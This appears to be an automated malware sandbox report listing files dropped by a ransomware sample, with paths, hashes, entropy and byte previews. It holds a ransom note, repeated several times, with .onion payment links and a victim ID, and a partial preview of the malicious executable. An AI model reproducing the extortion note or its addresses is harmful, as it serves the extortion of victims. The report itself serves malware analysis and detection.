                                                                                                                                                      Preview: c.2t...G|...D..9.........8Vp..D>.......g...~...;.%,..... ...........DA...zX.m...|O`k.b..g.....A{.......D=+./...p..x$...SLd..F..P..aA..k.U.K_8....57.I@6...K.&....OR*..cs..t.S.&...MO....3$.N.7.+.)8.G8K3.9...$..t....Er..|P...H.........9V..,.0.n.....4.va>^V...'8....l......%.O.}@..#.t.xe.........E.B....S....XY........l_.g...Zf....O.....h..+c...n=v....UI,.)............)5XsJ..$..*w..r..`}..v.\y...... V .=..X.V~ma/N. 6|.{8....T../.S.J_m.M..(.`oA4Y.3.q.u;[,9-W<E..iA:.j.~..4...@a.....I..].G6.|i.6....3..[...1~.|.,.".y............z..Q.0....R...\.0r..b....Y...V(.....V..s#......p....r1l.9BN$.!..[..'.).*.._yQ.^....J...,.e.X..L..R...G....9...6..'...Q.l.i..j...G{0h.... ....... ...V.t..J..X..G...<,.jJg.._....krPjP><.%}..O.vf..+.l.Z.....xT8k`.?.~"...j._!........jg.Cr.......iQ2+..FHz..*8.....x.<..s..c..`..:.K...-e.2H.H...+...S.[.zf.HW..Qc{.).[...`...6.z\WT...I..*.kA(..V...os]+.";.J...kv...S*e.....h...i."._.h..>.(.Z!.K&...#.g..!.o./....a..?r..l..
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\override[1].css
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2480
                                                                                                                                                      Entropy (8bit):7.269326305538243
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:0q0XngZPSws6iTE93+4+XsrIypW0omkNmzCwgck38VE:R0XnmPsxv4AsrXpUmkNmzTEUE
                                                                                                                                                      MD5:496D558CD0B393B68D234D760F09CB78
                                                                                                                                                      SHA1:6028269597D1C4E026CE515034ED99F21D59D7CE
                                                                                                                                                      SHA-256:2121B4F394A56F36CFBA5B184825644D7F59947BFA5E6DEB2AC410A98638B6A7
                                                                                                                                                      SHA-512:513091E06FC8761E6F2A0DAB046D417323C74E17A2EDFE40F24E969BCD633762D67DEFD6C3D73DF0FA99442BE70CD2E647BB574C739020AD045415B61FDAA260
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....-..$Mk.....h.g..dN..#L..0'%..V.5...2...?qS#.....C`=Y...(....}eD.E:".....v..^m.Ah...\-.K.J.Z.......?s......z..S.{.B.k..}'J.....+d<..=....-jV...x.........[....r!>...v.t.h...+/.r:=......'%....H~J62.[f.$$;...d.l...'...H.e:....E......_,..u.ic....Bv)\.Ig...........A..{.L.0...* ..]..qW...%s.....I.....H$..n..S_&.4Q.:}Z...J"u5 ..y.*..!k......#..(w...WZ6.. ..N.-..#z....g]t.....x.9..r!$..J..V.au..j."..>.cs8%..W.1.....M.Y..cxX.e....4.+h0.z5M..e..~...C..j^...O.r...'...u..i9.80.ye....!F....[B...:..8r.F...p.(....{X./..J.[...|.}..h........q.y.{.-...SlM.~..30.u.0..A.S..F..@......{OhV.f....3J..!T.,..j..I..R.8....(..^.T.f....X....Ih...|n.Qq...c........w..VZ.6..q.q...d.dE*..e5...|.M.....#/. ...|..T.*..+..'.@.'..qZ....?_.8.E..q o.n..... ".X..iG..l....3........R.t..c.......G.....PJRK=.....5.cVHq.ha.u7C.u...r........!wl....Y...nX.7...Qb.@..Q....]...r...7y&..z(..........hKl....-..yR..H.L.D....E... <.O.73Z.....w.....}....QN..P.>g.lK..6.t....qf.p.].y..F.>.....2..wa`..
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\qNpEAsGCLUb2B0s0naI1CmTvm1o.gz[1].js
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.400610391905305
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:gP9yLGNLLpjYKRN8wpsUtzK8sevWAVgKTaCB7RZ0cHYIgtyUz4BK:gPQOLN8fCzCwgck384
                                                                                                                                                      MD5:5DC12393AFECE51E383219ED2D573D0A
                                                                                                                                                      SHA1:79BAC4AB0FB238F3C6BDDCDEFDA1166DA1D16337
                                                                                                                                                      SHA-256:E8F8F2878AD06FD18CC4D936638A711647EB66CA3CAF79AF0060BD80070434CC
                                                                                                                                                      SHA-512:16FE97B020A12CA10167EE130891973154747918159C2F4C31BDDB6E1D0788F9AC1B603F59F97B864CA2866066FAE85D21AB3B44FF5C3A3B74CF868DB02476C7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..\.E......\....A.E....Q.../...E.\...._.3.....U&.....,.....Zn8p.%..k.._.....N6#....:qI....Q#W}X@7../...a....P.g......5...!.{....e..^A.Q.<y..s...........).<J..3*.V..T`+r.......6:C`.k...).'p6.Rv.X.{....-..._.I..0L. I..Qd?......^.<.A^"6..1k..&.,.NA!........A+....I..8..&g....}.[r..hu9Zai)...9{.Z..=.iBwK..Hg....PW......:`R.9@.../.N..^....u<\,...4.QHb..F.1Op.PF.Xb..k...^...XTD`..a...'..f.vjRu..b.,..rJ.....1..7..[./c.........<.....r.....`......{y.%+....#.g'...p...-.....q.@t..../...n(@....^|5Q0=q.`0.....U||.).......?.b.D.<R.#=z..n*AW Im&a12.F.+2|....R_b.d...,.!'.........D..h.....H.....y.Q........}..l......g..m.K..g$ye.1\..v67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\qsml[1].htm
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1424
                                                                                                                                                      Entropy (8bit):6.361306885025647
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:4P85nTIPRhrr7XS7ZnvxOzK8sevWAVgKTaCB7RZ0cHYIgtyUzovrN1:4UJYRhrrOJOzCwgck38FDN1
                                                                                                                                                      MD5:60C3A1154D7C1E3EEB1FD25CBFB3E64E
                                                                                                                                                      SHA1:2559EFF9167AC86E799CBA551393EEDA3538A59F
                                                                                                                                                      SHA-256:37202877DB1004C01205B953E3490EBECEC895001C5BED5AA7066C072F9763C2
                                                                                                                                                      SHA-512:9B2A3C9899D3D3ECC610144CCA62E5A3FD2B987378A726AB66C25A9192BB3B814A12BC911C71E964E0600B5D1497144C62A5F9AC8EA0DF5A3E64DE4A0D1ADF95
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: $..%P...wl......O...;R..E........|.....K.....(.'}..w.......Y-/.c.^.....}.Co.uy..33.l..Y...LB6$..1t.!r'....|.;T.{P.T.G.%I.Ve1AA.W.=.a.+.\..N.TP.....s...9...v.L..v>!B.. b<..........)6N..?...r.P..`R.m.\.,.V..0"kLu.z..M.....r3.7/.....&..6....K....Z.N...-c.</..HI.M.c...Iex.0w3.S...(Z..k...}.Xv.vUh..9.E.....3~U9..>.w..A.G..[...T.|!...{...%..Y.S.fmMf.e7.0..H.uP.C;....3.q.z.............y..._;..%.....Bn.%..z...&ZE...H"O../L..(f...iY..v..q.e2...f....B:...I0..V.._..,.|.mN.2..!......)..uT.jH....1.P....r=..l...M......h.*.x-....4.............W.......E2..?!..<<..?s[.D....b... .EG...A.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\qtrWr26X2qDu6oNpJ0ZLPBT4EsA.gz[1].js
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1232
                                                                                                                                                      Entropy (8bit):5.984647723809662
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:hKXjUjISdnRDF/3kAg2v0hlzK8sevWAVgKTaCB7RZ0cHYIgtyUzZ:CjUjIuRDF/k/lzCwgck38Y
                                                                                                                                                      MD5:E1236EC3C282C0FBEEA1C7256C480F9E
                                                                                                                                                      SHA1:F59722CD03CD63F75A6464653A1920AB725FE346
                                                                                                                                                      SHA-256:C2C43775902865FBBA2DF4033AEF00161415D9C6F5CAD03B63ACEA920B34C014
                                                                                                                                                      SHA-512:FCAA4A7C023F2FC7D9777CE2B93478E11EBB8DD6B15829C08025A57F665C35F4513527F9B698D65C23877E441D5C16F20854A0EC16AF0E66E4AF97233B2DA3F1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..L...~..w_..;.y....A.h..r./:..V*..Z.0c`...|....,..}............q...D..+.{=.0+.m..j...!F.....b..!,...7.|^Q.f!.....:.O.)...UR......Ut..m..7...".jZ.z..p?.7...s@_..Y...w...J.X.?.....-...u.7.V;.@.v..Z*.n..p..Li.y.:....b.1.q..b.._vx7..p-.:1.GCy.K...f..#.bY.l.S4..V...3o..P..A..M..`......x..>}.f @..V.-..3K.w...........P.=........ufP-....h..W....3V...H.....4n;.^.%......q.MwL.W#.\N.[j.muY3...cZt.~.(.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):50064
                                                                                                                                                      Entropy (8bit):5.156293418554617
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:IMigteWzX1yeocPIgSlHgQWnHhgbvuaU0MX4rnf5Yyp8PesuHRYZEW6NEf1PPv3I:IMaGlyeogW9lrf5Yyp8GoZEHKj/0
                                                                                                                                                      MD5:31DCBA676413F7D07DB227A6775529D6
                                                                                                                                                      SHA1:66701C6255582D82487EBF7C1C065EA101156C90
                                                                                                                                                      SHA-256:652978734F7CD91A1C7E36B50C20CE74FF4E0E776086D8A073B6F3646C0CBB6F
                                                                                                                                                      SHA-512:EE4640CD30A80ACBC6F676CEA6B4321FCDDD024D66B6A5094F42B38F46B9BDE6DFD119C700798E5AE39B8518C0150AEA9FC1D811BBFF87BE9FC896E8D61B14DC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .[W'h..Y..9-U..e....n`E.a..!....=.*..@w.EA..e....,.N.-nG .I...QO..a...U..v.....,G.V>.i.....c...u.]..sb#.[M.$.O5.58.._.g....J..L*...sA...R...!vFZ}8(.A..L| ..Dq.....d...>....>...|Bo..85j.k......tN.\.y...nD._...&@W.=...E.2R\...?..m.....8>.a...A.J.'.RH+..2.Q.n..2..2b...l.....<'j.0.t....q!g...`...<...T...2LA...w.....x....2...9.p/..8....`N.Np...RYr.....1.....#...P._}...&Ytqe}..a.....m..E.d<....v.>.!$..V.t.._..!...D.lj..&a.z@=r+m...N.....|..#...&c.z..y...x.)_=.N.k.bS80....A.J......%.......<...!..n...\..b.v .......:D...dP......e.+....c_....E..c....pLa:..U.. .u..`...".F.~. t~%b...)..8BC..:.Cp.2.....e.u5#......K..,.y."... ..?.V....=b..n\C.@..-....0.Ze...p..Q.m....|.L0.L]......G.=D.?xr..H.5-.S.Q7.&.....~.a..*..2V.=.A...@.{.#....D.%I....+\.....[O......o.9..e.+.u..........w..B.7..9T.x.I.....l...W....*.F.$..~..b70....y...<iS,.B|. .GXihrc\Y.G..<..|J2.$...jP`.vQk.*+.../.._...t..v.~.9........Uy.+!Z...}..Jgx.R...Zg=w>.s..3H.`..."..5.w.V>,.B&..";.;Y....
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):123960
                                                                                                                                                      Entropy (8bit):5.27765187901225
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:AMX2EqEPzo9Bk8FMerdSTxzKihbUJzlOPeOBZ5SlYiIY34:ojEPziBDMeZSTNKi55jip34
                                                                                                                                                      MD5:31A1EEAC8CF8DAB793EFE0945AF68B68
                                                                                                                                                      SHA1:46B99B209E71027128839F3806C16B93C1FCE978
                                                                                                                                                      SHA-256:0835ACCA0BCE0494B2904CBF101F95F1B43AB5BD4AE131F34EDA782DA3DE7AEA
                                                                                                                                                      SHA-512:2DAC2765DDF7E6E356D3877DB5C70F0AB79BD8AAFDF87435B43A3974D2C95E30B6B29E2CBC81689C8BF7058259B00EF9FC9934E6D2E86963F269B3C729EBEE5A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..Ny.....f.....';.WUF....O...E...yo.n.8.G.I.si.q.9..bx.fG..H.m..}f.VG6......q.@_t.$(....Z]V...i...c..>...{h.......b.-...y7$%.(..5Q.+:..P ...<W......`.SB..3#.].E.2G.p].e...1.hHD.....=...]..8.=.?Fu.....=n,1}P.9...&........ZR...D...}..:5\M~....NM...2[.m.+.A.A.}....<)..^......z.6.....A...0O.. ..|.)..|.=....]...t...&9.nFEN\........&.p.....a.f.K...5....#..@....>.[.....m.....wSZ]x....qjr..H............Z.A.%V.Za._..\M....`.......@..t+..E....N....^..3...~..D..R.Cpu.L:$.5].{.n.l..1...%..`..Y..us..V..N.rt2.G0......f.8...3_~..2..?....n2.....ip...S....~Uk[..qk...sp.....z...5P.V..}-.....&....x.....L...9<{V[..M"....0|.D.Oj....?^.^..-%..W.j.N.E......S!....2....w.k7.$..7S.9J_.....FXb.m..).h.]....'..0...K.i.4...`s.Ac..L..ey.(.].2.G1....Q.W,M./.;...S.^P2.....9....0q.O.....=.!d`..1.X_...&K.ud.tz..........!.Ze!Rr,a.7i...4@.........'..QM...X..~.....l......Zn.c.x....t.G7Q..Qx{3..9...W.).j@eO......q..2Vo..K.=+.$....>..`...p....651:Uz".r...e....:........
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):368640
                                                                                                                                                      Entropy (8bit):7.43420039841384
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:wV2wg8YeX+AbD+b5LKysUMRci1qlVPuYweoXfNSkB7mOB2z4tM:SPOAi2ysVqlVXx4NSc7RB2z4
                                                                                                                                                      MD5:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      SHA1:D68049989CE98F71F6A562E439F6B6F0A165F003
                                                                                                                                                      SHA-256:59E0AB333060B4E510DB5D36D87F0FE267AB66B0881955649B06D91D6DD2D486
                                                                                                                                                      SHA-512:9211A74CFA23C70C6ACE8BD168ECBE1BB4A06D2E03B5ADFF5546115137B6CE849D3E41337581123D48E5082319F507D8F2D274621317FADA182530E4A0ABB6C7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a..............P.................. ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......@...t............i..h............................................*....(.......(.......( ......(.......(!....*N..(....o....("....*..(#...*"..o$...*"..(%...*&..(&....*.s'........s(........s)........s*........s+........*Z........o3...........*&..(4....*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*...{......,.+.....,.rq..p(/...z..|....(...+*...{......,.+.....,.rq..p(/...z..|....(...+
                                                                                                                                                      C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe:Zone.Identifier
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):26
                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\0164771190
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.405033240206964
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:tXeY0z87K9rivsBMOLVQrvAAYHzK8sevWAVgKTaCB7RZ0cHYIgtyUzQT:10z87wivsqOLWWzCwgck38rT
                                                                                                                                                      MD5:A1A784FC936B678399B83A848C3A8D70
                                                                                                                                                      SHA1:48097844C1A2E74C817B12E92D4FBF4B8B9AE8E9
                                                                                                                                                      SHA-256:A50A21167EC39E05F9695DE85A5E1F028E3ED5D88F595F5982309482EBC1577B
                                                                                                                                                      SHA-512:DF2BD6EE2402DDAD2C471BE48AA85C361BF502D6503127FA1A786FC9B37DA026F91625F15081A7F9C89B792806CAF2EF80D3CE3DC814478A9F319577468F8517
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: W.a.X......>.\gc`..687....`0.e....d...KS......!.U...a....G>...8...x.B?P..R.....&.a....G..!.l..]........A...7.....U....n.~.E3_.......W.\........4....{.G........3..1X..a.._0......@L....x.*..h5..ey.J,.G..[.(...p.....ly<.X........K.@..B.,j...?..#j........?.D.4|)xN.....4......`.r`P.+...95f.M..{.qL.Xi...=.......x}q..B....._3J...#v.wm^.....`2W2.....R+.I.04....:.P...|..p....6...|. .v.H\.I*...{...A.GF0..r.'U{.5w?....y..,.`)...Q.i,bA.Yw^.g... sx....Orf.@.Nc..[vEb...o.X....o.+.(.1.6..N...u.;..n..+....h_.SR....|...V..FS,....<+...<....>E.4.%\....}4j9......i.\.7>...|.c..).Z.J...q.6Gh"h.T...M.E...z.Y'=.#..32?.Q.m.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp3BD7.tmp
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1643
                                                                                                                                                      Entropy (8bit):5.193792141857937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBmtn:cbh47TlNQ//rydbz9I3YODOLNdq3a
                                                                                                                                                      MD5:0B997C983C706527E9E713B8C39109A2
                                                                                                                                                      SHA1:5C76A174A004CFB0415790B8F3487E38E9957A19
                                                                                                                                                      SHA-256:9AE1F04B7C7749CD9973F8E90894908A66E2D31F3B4170B0553E362A2510CD52
                                                                                                                                                      SHA-512:44B3AC7FA13D97A4E5F02FFA60E96E03F6A300AA431D5AF3872FC08F28ABB37D329A7D7BD37DE61347F5C8D7A7305F73213EEFA63D6125B3B7504E2A9A46BDFC
                                                                                                                                                      Malicious:true
